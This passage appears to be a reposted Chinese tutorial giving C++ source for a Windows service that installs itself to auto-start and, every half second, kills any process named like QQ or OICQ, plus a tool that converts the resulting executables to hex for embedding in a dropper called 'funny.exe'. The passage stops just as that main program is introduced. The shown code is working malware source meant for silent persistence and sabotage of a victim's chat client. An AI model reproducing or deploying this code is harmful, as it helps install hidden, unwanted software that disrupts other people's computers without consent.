本文共 5061 字,大约阅读时间需要 16 分钟。
// #include "stdafx.h" #include "Service.h" #include "winsvc.h" #include <atlbase.h> //CRegKey类需要的头文件 #include <Afxtempl.h> //CArray类需要的头文件 #include <tlhelp32.h> //ToolHelp函数需要的头文件 #ifdef _DEBUG #define new DEBUG_NEW #undef THIS_FILE static char THIS_FILE[] = __FILE__; #endif / // The one and only application object CWinApp theApp; using namespace std; SERVICE_STATUS_HANDLE ssh; SC_HANDLE scm,svc; SERVICE_STATUS ss; CArray<PROCESSENTRY32,PROCESSENTRY32 &> m_PEArray; void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv); void WINAPI Handler(DWORD Opcode); void InstallService(); UINT KillQQ(LPVOID lpvoid); int _tmain(int argc, TCHAR* argv[], TCHAR* envp[]) { int nRetCode = 0; // initialize MFC and print and error on failure if (!AfxWinInit(::GetModuleHandle(NULL), NULL, ::GetCommandLine(), 0)) { // TODO: change error code to suit your needs cerr << _T("Fatal Error: MFC initialization failed") << endl; nRetCode = 1; } else { SERVICE_TABLE_ENTRY ste[2]; //线程入口表 ste[0].lpServiceName="Service"; //线程名字 ste[0].lpServiceProc=ServiceMain; //线程入口地址 //可以有多个线程,最后一个必须为NULL ste[1].lpServiceName=NULL; ste[1].lpServiceProc=NULL; StartServiceCtrlDispatcher(ste); InstallService(); } return nRetCode; } //安装并启动服务 void InstallService() { LPTSTR lpSysPath=new char[MAX_PATH]; ::GetSystemDirectory(lpSysPath,MAX_PATH); LPCTSTR lpsysfilename; lpsysfilename=(LPCTSTR)lstrcat(lpSysPath,"//Service.exe"); scm=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS); if(scm!=NULL) svc=CreateService(scm,"Service","Service",SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS│SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,lpsysfilename,NULL,NULL,NULL,NULL,NULL); if(svc!=NULL) svc=OpenService(scm,"Service",SERVICE_START); if (svc!=NULL) { StartService(svc,0,NULL); CloseServiceHandle(svc); } CloseServiceHandle(scm); } //服务的真正入口点函数 void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv) { ss.dwServiceType = SERVICE_WIN32; ss.dwCurrentState = SERVICE_START_PENDING; ss.dwControlsAccepted = SERVICE_ACCEPT_STOP│ SERVICE_ACCEPT_PAUSE_CONTINUE; ss.dwServiceSpecificExitCode = 0; ss.dwWin32ExitCode = 0; ss.dwCheckPoint = 0; ss.dwWaitHint = 0; ssh=RegisterServiceCtrlHandler("Service",Handler); ss.dwCurrentState = SERVICE_RUNNING; ss.dwCheckPoint = 0; ss.dwWaitHint = 0; SetServiceStatus(ssh,&ss); AfxBeginThread(KillQQ,NULL,NULL); //开始一个工作线程实现程序功能 ss.dwCurrentState = SERVICE_RUNNING; ss.dwCheckPoint = 0; ss.dwWaitHint = 0; SetServiceStatus(ssh,&ss); } //处理服务要求 void WINAPI Handler(DWORD Opcode) { switch(Opcode) { case SERVICE_CONTROL_STOP: ss.dwCurrentState =SERVICE_STOPPED; SetServiceStatus (ssh,&ss); break; case SERVICE_CONTROL_CONTINUE: ss.dwCurrentState = SERVICE_RUNNING; SetServiceStatus (ssh,&ss); break; case SERVICE_CONTROL_PAUSE: ss.dwCurrentState = SERVICE_PAUSED; SetServiceStatus (ssh,&ss); break; case SERVICE_CONTROL_INTERROGATE: break; } SetServiceStatus (ssh,&ss); } //在进程列表中查找QQ程序并杀掉的线程函数 UINT KillQQ(LPVOID lParam) { while(1) { m_PEArray.RemoveAll(); HANDLE hProcessSnap=NULL; PROCESSENTRY32 pe32; hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); pe32.dwSize=sizeof(PROCESSENTRY32); if(::Process32First(hProcessSnap,&pe32)) { do { m_PEArray.Add(pe32); } while(::Process32Next(hProcessSnap,&pe32)); } int i; for(i=0;i<m_PEArray.GetSize();i++) { CString str; str.Format("%s",m_PEArray[i].szExeFile); if(str.Find("QQ")!=-1││str.Find("OICQ")!=-1││str.Find("qq")!=-1││str.Find("oicq")!=-1) { HANDLE hProcess; DWORD ProcessID; ProcessID=m_PEArray[i].th32ProcessID; hProcess=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,ProcessID); ::TerminateProcess(hProcess,99); CloseHandle(hProcess); } } Sleep(500); } return 0; } 编译连接可以生成Service.exe程序.(后附整个工程) 现在我们已经得到了实现功能的两个程序,kernel.exe是在Win9X系统下实现功能的程序,Service.exe是Win2000/XP下实现功能的程序.现在就要将这两个文件转化成16进制代码.可以通过一个程序来实现,建立一个名为exe2hex的Win32 Console Application程序,程序代码如下: #include <stdio.h> #include <windows.h> int main(int argc,char **argv) { HANDLE hFile; DWORD dwSize,dwRead,dwIndex=0,i; unsigned char *lpBuff=NULL; __try { if(argc!=2) { printf("/nUsage: %s <File>",argv[0]); __leave; } hFile=CreateFile(argv[1],GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); if(hFile==INVALID_HANDLE_VALUE) { printf("/nOpen file %s failed:%d",argv[1],GetLastError()); __leave; } dwSize=GetFileSize(hFile,NULL); if(dwSize==INVALID_FILE_SIZE) { printf("/nGet file size failed:%d",GetLastError()); __leave; } lpBuff=(unsigned char *)malloc(dwSize); if(!lpBuff) { printf("/nmalloc failed:%d",GetLastError()); __leave; } while(dwSize>dwIndex) { if(!ReadFile(hFile,&lpBuff[dwIndex],dwSize-dwIndex,&dwRead,NULL)) { printf("/nRead file failed:%d",GetLastError()); __leave; } dwIndex+=dwRead; } for(i=0;i<dwSize;i++) { if((i%16)==0) if(i==0) printf("/""); else printf("/"/n/""); printf("//x%.2X",lpBuff[i]); } printf("/""); }//end of try __finally { if(lpBuff) free(lpBuff); CloseHandle(hFile); } return 0; } 编译出可执行文件exe2hex.exe,执行exe2hex kernel.exe >kernel.txt将输出结果重定向到一个文本文件就得到了kernel.exe的16进制代码,同理可以得到Service.exe的16进制代码. 啊,写了这么多还真有点累了,不过还好总算要完成了,歇口气.最后我们来编写主程序funny.exe:
转载地址:http://mwiob.baihongyu.com/